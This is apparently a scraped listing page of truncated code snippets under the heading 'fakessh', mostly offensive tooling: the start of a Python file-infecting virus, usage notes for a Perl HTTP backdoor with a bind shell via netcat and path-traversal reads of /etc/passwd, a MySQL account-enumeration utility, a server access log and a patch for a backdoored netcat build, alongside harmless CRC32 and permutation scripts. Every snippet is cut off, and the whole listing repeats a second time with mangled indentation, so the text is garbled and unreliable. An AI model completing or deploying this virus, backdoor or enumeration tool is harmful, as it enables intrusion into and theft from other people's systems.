fakessh fakessh

## infect py file
#!/usr/bin/python
import os
import datetime
SIGNATURE = "CRANKLIN PYTHON VIRUS"
def search(path):
    filestoinfect = []
    filelist = os.listdir(path)
    for fname in filelist:
        if os.path.isdir(path+"/"+fname):
            filestoinfect.extend(search(path+"/"+fname))

## client.c
#include <stdio.h>
#include <getopt.h>
#include <netinet/ip.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>

## bindshellhttpdbackdoor.pl
#!usr/bin/perl -w

# httpdbackdoor.pl Usage:
# 1. bind shell:
# nc target 8080
# ->SHELLPASSWORD{ENTER}{ENTER}
# 2. download files
# http://target:8080/file?/etc/passwd
# or
# http://target:8080/file?../some/file

## mysqluserenum.pl
# MySQL User Account Enumeration Utility
# When an attacker authenticates using an incorrect password
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
# the mysql server will respond with a different message than Access Denied, what makes
# User Account Enumeration possible.
# The Downside is that the attacker has to reconnect for each user enumeration attempt
#20000 user accounts in 7 minutes
#Mon Jan 16 09:00:18 UTC 2012
#Mon Jan 16 09:07:26 UTC 2012
#root@vs2067037:~# wc -l MEDIUM.LST

## hashcrc32.c
/**************************************************************
* *
* Fichier : crc32.c *
* Fonctions pour calculer le hash CRC32 *
* *
**************************************************************/
/* Table of CRCs of all 8-bit messages. */
unsigned long crc32_table[256];
/* Flag: has the table been computed? Initially false. */
int crc32_table_computed = 0;

## httpsd_access_log
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:09 -0700] "POST /login_up.php3 HTTP/1.1" 200 966 "Referer: htts://{removed}:8443/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5"
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:11 -0700] "GET / HTTP/1.1" 200 1474 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5"
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:15 -0700] "POST /plesk/client@1/domain@/?context=domains HTTP/1.1" 200 59408 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5"
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:19 -0700] "GET /plesk/client@1/domain@3/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/media/system/js/ HTTP/1.1" 200 71214 "https://{removed}:8443/plesk/client@1/domain@3/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/media/system/js/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko)

## permuteperl.pl
#!/usr/bin/perl

use Algorithm::Permute;


my @array = (1..9);
Algorithm::Permute::permute { print "@array\n" } @array;

## generatepermutation.pl
#!/usr/bin/perl

use List::Permutor;

my $permutor = List::Permutor->new( 0, 1, 2);
while ( my @permutation = $permutor->next() ) {
    print "@permutation\n";
}

## permute.pl
#!/usr/bin/perl

use Algorithm::Permute;

  my $p = new Algorithm::Permute(['a'..'d']);
  while (@res = $p->next) {
    print join(", ", @res), "\n";
  }

## nc.patch
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents.
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c
*** /home/swilting/Téléchargements/nc/getopt.c	1996-11-06 22:40:36.000000000 +0100
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c	2012-10-26 15:30:01.812133992 +0200
***************
*** 45,51 ****
  #include <stdio.h>

  #ifdef WIN32
! #include <string.h>
	#!/usr/bin/python
	import os
	import datetime
	SIGNATURE = "CRANKLIN PYTHON VIRUS"
	def search(path):
	filestoinfect = []
	filelist = os.listdir(path)
	for fname in filelist:
	if os.path.isdir(path+"/"+fname):
	filestoinfect.extend(search(path+"/"+fname))
	#include <stdio.h>
	#include <getopt.h>
	#include <netinet/ip.h>
	#include <stdlib.h>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <arpa/inet.h>
	#include <unistd.h>
	#include <errno.h>
	#include <string.h>
	#!usr/bin/perl -w

	# httpdbackdoor.pl Usage:
	# 1. bind shell:
	# nc target 8080
	# ->SHELLPASSWORD{ENTER}{ENTER}
	# 2. download files
	# http://target:8080/file?/etc/passwd
	# or
	# http://target:8080/file?../some/file
	# MySQL User Account Enumeration Utility
	# When an attacker authenticates using an incorrect password
	# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
	# the mysql server will respond with a different message than Access Denied, what makes
	# User Account Enumeration possible.
	# The Downside is that the attacker has to reconnect for each user enumeration attempt
	#20000 user accounts in 7 minutes
	#Mon Jan 16 09:00:18 UTC 2012
	#Mon Jan 16 09:07:26 UTC 2012
	#root@vs2067037:~# wc -l MEDIUM.LST
	/**************************************************************
	* *
	* Fichier : crc32.c *
	* Fonctions pour calculer le hash CRC32 *
	* *
	**************************************************************/
	/* Table of CRCs of all 8-bit messages. */
	unsigned long crc32_table[256];
	/* Flag: has the table been computed? Initially false. */
	int crc32_table_computed = 0;
	41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:09 -0700] "POST /login_up.php3 HTTP/1.1" 200 966 "Referer: htts://{removed}:8443/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5"
	41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:11 -0700] "GET / HTTP/1.1" 200 1474 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5"
	41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:15 -0700] "POST /plesk/client@1/domain@/?context=domains HTTP/1.1" 200 59408 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5"
	41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:19 -0700] "GET /plesk/client@1/domain@3/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/media/system/js/ HTTP/1.1" 200 71214 "https://{removed}:8443/plesk/client@1/domain@3/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/media/system/js/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko)
	#!/usr/bin/perl

	use Algorithm::Permute;


	my @array = (1..9);
	Algorithm::Permute::permute { print "@array\n" } @array;
	#!/usr/bin/perl

	use List::Permutor;

	my $permutor = List::Permutor->new( 0, 1, 2);
	while ( my @permutation = $permutor->next() ) {
	print "@permutation\n";
	}
	#!/usr/bin/perl

	use Algorithm::Permute;

	my $p = new Algorithm::Permute(['a'..'d']);
	while (@res = $p->next) {
	print join(", ", @res), "\n";
	}
	Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents.
	diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c
	*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100
	--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200
	***************
	* 45,51 **
	#include <stdio.h>

	#ifdef WIN32
	! #include <string.h>